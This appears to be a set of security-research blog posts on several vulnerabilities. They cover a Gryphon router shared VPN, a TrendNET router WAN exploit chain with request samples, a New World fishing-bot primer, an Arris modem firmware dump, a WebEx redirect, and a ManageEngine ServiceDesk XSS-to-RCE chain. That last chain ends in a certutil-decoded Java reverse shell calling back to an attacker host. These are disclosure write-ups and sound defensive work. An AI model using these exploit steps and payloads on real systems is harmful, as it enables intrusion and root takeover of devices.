In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information:

Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Connection: close
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Connection: close
Cookie: compact_display_state=false

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.

TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New World’s Botting Problem

11 November 2021 at 14:02

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a neverending game of cat and mouse. That said, there are plenty of legitimate tools out there that do make this a much safer option, such as running their screen watchers on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. What’s not to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but it takes much more effort and is more prone to false positives, which may be against the interest of the game studio if they were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
with mss.mss() as screen:
img = screen.grab(region), img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
    # Grab region
with mss.mss() as screen:
img = screen.grab(region), img.size, output="sample.png")
    # Convert image to format usable by cv2
img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)
    # Check if the tenable logo is present
result = cv2.matchTemplate(img_cv, to_detect, eval('cv2.TM_CCOEFF_NORMED'))
if((result >= 0.6).any()):

Running the above and dragging a logo template into the region of the screen this is on will trigger the “DETECTED” message. To note, this code snippet may not work exactly as written depending on your monitor setup and configured resolution. There might be settings that need to be tweaked in some scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.

New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.


8 September 2021 at 13:03

Picked up one of these a little while back at the behest of a good friend.

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.


There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.


Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat


Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd


Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on “brcmnand.1”:
0x000000000000–0x000000620000 : “flash1.kernel0”
0x000000620000–0x000000c40000 : “flash1.kernel1”
0x000000c40000–0x000001fa0000 : “flash1.cm0”
0x000001fa0000–0x000003300000 : “flash1.cm1”
0x000003300000–0x000005980000 : “flash1.rg0”
0x000005980000–0x000008000000 : “flash1.rg1”
0x000000000000–0x000008000000 : “flash1”
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on “spi32766.0”:
0x000000000000–0x000000100000 : “flash0.bolt”
0x000000100000–0x000000120000 : “flash0.macadr”
0x000000120000–0x000000140000 : “flash0.nvram”
0x000000140000–0x000000160000 : “flash0.nvram1”
0x000000160000–0x000000180000 : “flash0.devtree0”
0x000000180000–0x0000001a0000 : “flash0.devtree1”
0x0000001a0000–0x000000200000 : “flash0.cmnonvol0”
0x000000200000–0x000000260000 : “flash0.cmnonvol1”
0x000000260000–0x000000330000 : “flash0.rgnonvol0”
0x000000330000–0x000000400000 : “flash0.rgnonvol1”
0x000000000000–0x000000400000 : “flash0”

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

import sys
data_area = 512
spare = 16
combined = data_area + spare
with open(‘rg1’, ‘rb’) as f:
dump =
count = int(len(dump) / combined)
out = b’’
for i in range(count):
out = out + dump[i*block : i*combined + data_area]
with open(‘rg1_stripped’, ‘wb’) as f:

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
dump =
with open('rg1_little', 'wb') as f:
# Page size is 2048
block = 2048
nblocks = int(len(dump) / block)

# Iterate over blocks, byte swap each 32-bit value
for i in range(0, nblocks):
current_block = dump[i*block:(i+1)*block]
j = 0
while j < len(current_block):
section = current_block[j:j+4]
j = j + 4


Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs


Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!

ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:


While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:


From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that a given attacker could construct a fake WebEx meeting invite (whether through a malicious domain, or simply getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to


The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

Now, obviously, I want to emphasize that this flaw is relatively complex as it requires user interaction and is of relatively low impact. For starters, this attack already requires an attacker to trick a user into visiting a malicious link (providing a fake meeting invite via a custom domain for example) and then allowing WebEx to launch from their browser. In this case, we already have an attacker getting someone to visit a possibly malicious link. In general, we wouldn’t report this sort of issue due to no security boundary being crossed; that’s too silly for even me to report. In this case, however, there is a security boundary being crossed in that we are able to force the victim to open a malicious link with a specific browser (Safari), which would allow an attacker to specially craft payloads for that target browser.

To clarify, this is a pretty lame, but fun bug. While it’s tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)

Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.


ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
… snip ...

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.


Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.


Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

Being an IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021–20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
return restrictedWords.split(",");
public Set containsScriptRestrictedWords(String input) throws Exception {
HashSet<String> input_words = new HashSet<String>();
input_words.addAll(Arrays.asList(input.split(" ")));
return input_words;

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

